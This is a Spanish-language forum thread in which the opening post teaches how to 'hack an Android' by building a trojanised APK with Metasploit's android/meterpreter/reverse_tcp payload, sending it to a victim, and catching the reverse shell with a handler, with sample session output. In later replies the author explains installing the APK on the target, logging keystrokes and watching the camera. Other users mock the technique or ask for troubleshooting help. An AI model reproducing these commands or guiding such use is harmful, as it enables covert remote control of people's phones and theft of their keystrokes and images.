Les mostrare como hackear un android

Iniciado por Grillet0xEB, 18 Enero 2014, 23:21 PM

0 Miembros y 1 Visitante están viendo este tema.

Grillet0xEB

Hoy les mostrare como hackear un android que se encuentre en una red local usando Metasploit en BackTrack 5

1.) Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2.) Una vez hecho eso pondremos en Metasploit lo siguiente....


search Android


Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada


sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip" LPORT=Puerto R > "Ruta+ Aplicación.apk

Ejemplo :

sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /root/Desktop/Hack.apk



Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit 

por qué pongo "R" si siempre se crea el ejecutable con "X" , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk

Bueno una vez hecho eso, cargamos el exploit ......


sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST="Su ip puesta en el backdoor" LPORT="Su puerto" E

Ejemplo:

sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E


Bueno ahora la victima cuando instale la Apk, infectada nos saldrá esto....


       =[ metasploit v4.7.0-1 [core:4.7 api:1.0]
+ -- --=[ 1141 exploits - 720 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops

PAYLOAD=> android/meterpreter/reverse_tcp
LHOST=> 192.168.1.35

[*] Started reverse handler on 192.168.1.35:4444
[*] Starting the payload handler...
[*] Sending stage (39698 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.34:40715) at 2014-01-10 05:02:51 +0200

meterpreter >



Ya que tenemos la sesión en meterpreter escrbimos "help" para ver los comando que nos da meterpreter para este dispositvo

Espero les guste 
Grillet0xEB ;)

robertofd1995

tengo un par de dudas , lo que has puesto aqui es como instalar un troyano en un dispositivo android , no?

una vez conectado con el dispositivo , que es lo que podemos hacer , pq segun lo que has comentado es como si para cada dispositivo tuvieramos funciones distintas

y de paso tengo otra pregunta , una vez hecho lo que has descrito aqui , si quisiera sacar las teclas que introduce , vaya un keylogger , como tendria que hacer ese paso ?

engel lex

yo tengo un pregunta... como es esto "hacking avanzado" y no "hacking basico"? es decir, necesitas que la victima instale un apk sin firmar ni nada, y primero que de desactive orígenes de terceros... si esto es avanzado vamos mal en este mundo señores...
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Grillet0xEB

Citar
tengo un par de dudas , lo que has puesto aqui es como instalar un troyano en un dispositivo android , no?

una vez conectado con el dispositivo , que es lo que podemos hacer , pq segun lo que has comentado es como si para cada dispositivo tuvieramos funciones distintas

y de paso tengo otra pregunta , una vez hecho lo que has descrito aqui , si quisiera sacar las teclas que introduce , vaya un keylogger , como tendria que hacer ese paso ?

Si, mira, conectas el tlf a la pc y pasas la aplicación o, pones la aplicación en un servidor local

Lo que pasa es que meterpreter te da comandos diferentes para móviles y para pc´s, pero todos los comandos para pc son iguales y todos los comandos para móviles son iguales

El keylogger lo activas escribiendo keyscan_start y para ver lo que ha escrito escribes keyscan_dump, también puedes tomar fotos de la cámara y ver la cámara en vivo en ciertos dispositivos corriendo un servidor local
Grillet0xEB ;)

beholdthe

Cita de: engelx en 19 Enero 2014, 00:06 AM
yo tengo un pregunta... como es esto "hacking avanzado" y no "hacking basico"? es decir, necesitas que la victima instale un apk sin firmar ni nada, y primero que de desactive orígenes de terceros... si esto es avanzado vamos mal en este mundo señores...
Opino lo mismo.
Vamos, que solo te falta llamarle por teléfono y decirle "oye, instálate esto".

patricioo

wenas amigos,al final tube que registrarme.aver si me podeis ayudar.

antes he usado Metasploit,pero llevo años sin tocarlo y me estoy volviendo  :rolleyes:

estoy intentando hacer una prueba de penteste a mi android,baje Metasploit
pero no logro armar el apk.

he estado mirando manuales,pero es en kali linux o black track,perdon si lo escribo mal y este es = .

me prodrias decir como lo armo desde Metasploit?

pongo:

search android

use android/meterpreter/reverse_tcp
aki saldria el modulo cargado => show options

luego con set pongo el lhost t el lport y ya no se como seguir.puse help y me salian el comando check o algo asin generate y no se cual mas.

le doy generate y pone 84x45x asin un buen cacho terminan en +." puedo hacer un video"

pero no consigo general el .apk.los comandos aki descritos no me siven. sudo msfpayload. :huh:


falcon6

me da un error al instalar el apk lo probe en mi telefono y no se instala.
alguna sugerencia?